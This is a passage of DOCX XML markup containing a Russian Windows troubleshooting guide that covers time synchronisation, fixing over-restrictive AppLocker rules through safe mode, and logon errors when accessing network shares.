        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем коснитесь или щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка даты и времени</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">на вкладке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Время Интернета</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> коснитесь или щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменение параметров</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">установите флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Синхронизировать с сервером времени Интернета</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем коснитесь или щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновить сейчас</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">если ваш компьютер не подключен к Интернету или находится в режиме </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в самолете</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, синхронизация завершится ошибкой. Убедитесь, что компьютер подключен к Интернету и не находится в режиме </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в самолете</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">по завершении синхронизации вы получите сообщение о том, что часы были успешно синхронизированы, с указанием имени сервера времени Интернета, а также даты и времени последней синхронизации; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">после того как дата и время будут успешно синхронизированы, перезагрузите компьютер. Для этого проведите пальцем от правого края экрана и коснитесь </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. (Если используется мышь, поместите курсор в правый верхний угол экрана, переместите его вниз и щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">коснитесь или щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выключение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="ui"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перезагрузка</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Последовательность действий по устранению проблемы входа пользователей в систему с примененными политиками AppLocker.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Правила AppLocker слишком ограничительны. Правила ограничивают запуск приложений и других исполняемых файлов, расположенных в каталоге Windows, что делает невозможным корректный запуск критически важных процессов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если для задания политик AppLocker используются групповые политики, измените на сервере настройку групповой политики, которая влияет на целевой компьютер. Подождите несколько минут, а затем перезапустите клиентский компьютер, чтобы компонент оболочки загрузился корректно. Если для задания политик AppLocker используется оснастка </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Локальная политика безопасности</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, воспользуйтесь следующей процедурой для устранения проблемы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание правил AppLocker по умолчанию:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">чтобы перезапустить компьютер в безопасном режиме, во время запуска компьютера нажмите и удерживайте клавишу F8 или нажимайте ее до тех пор, пока не отобразится меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Дополнительные варианты загрузки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">после запуска компьютера в безопасном режиме нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Найти программы и файлы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> введите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>secpol.msc</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и нажмите клавишу ВВОД;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">в дереве консоли разверните пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Политики управления приложениями</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, а затем разверните пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>AppLocker</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">щелкните правой кнопкой мыши пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Исполняемые правила</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и выберите команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Создать правила по умолчанию</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">убедитесь, что для папок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Program Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> созданы правила по умолчанию, а затем перезапустите компьютер;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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возможно, потребуется дважды перезагрузить компьютер, чтобы убедиться в правильном применении правил.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Устранение типовых проблем, которые чаще всего встречаются при доступе в сетевым ресурсам сетей на базе Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">По умолчанию в стандартной Windows доступ к сетевым ресурсам без пароля запрещен. В бездоменной сети или необходимо создать пользователей с одинаковыми паролями на всех машинах, или же включить учетные записи гостей, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если используется авторизация через Гостя), или же назначить тех пользователей, которые будут авторизоваться на машине (в случае авторизации по имени пользователя и паролю).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>И здесь могут возникнуть 2 типовые ошибки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вход в систему не произведен. Имеются ограничения, связанные с учетной записью;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вход в систему не возможен: выбранный режим входа для данного пользователя на этом компьютере не предусмотрен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Обе они вызваны настройками локальных политик безопасности на том компьютере, к которому производится подключение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Вход в систему не произведен. Имеются ограничения, связанные с учетной записью. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Необходимо изменить: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
        </w:rPr>
        <w:t>Панель управления &gt; Администрирование &gt; Локальные параметры безопасности &gt; Локальные политики &gt; Назначение прав пользователя &gt; Отказ в доступе к компьютеру из сети</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>. Из списка пользователей там необходимо удалить всех, кроме SUPPORT_*. Это позволит подключаться к машине под аккаунтом Гость (если на включена локально).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
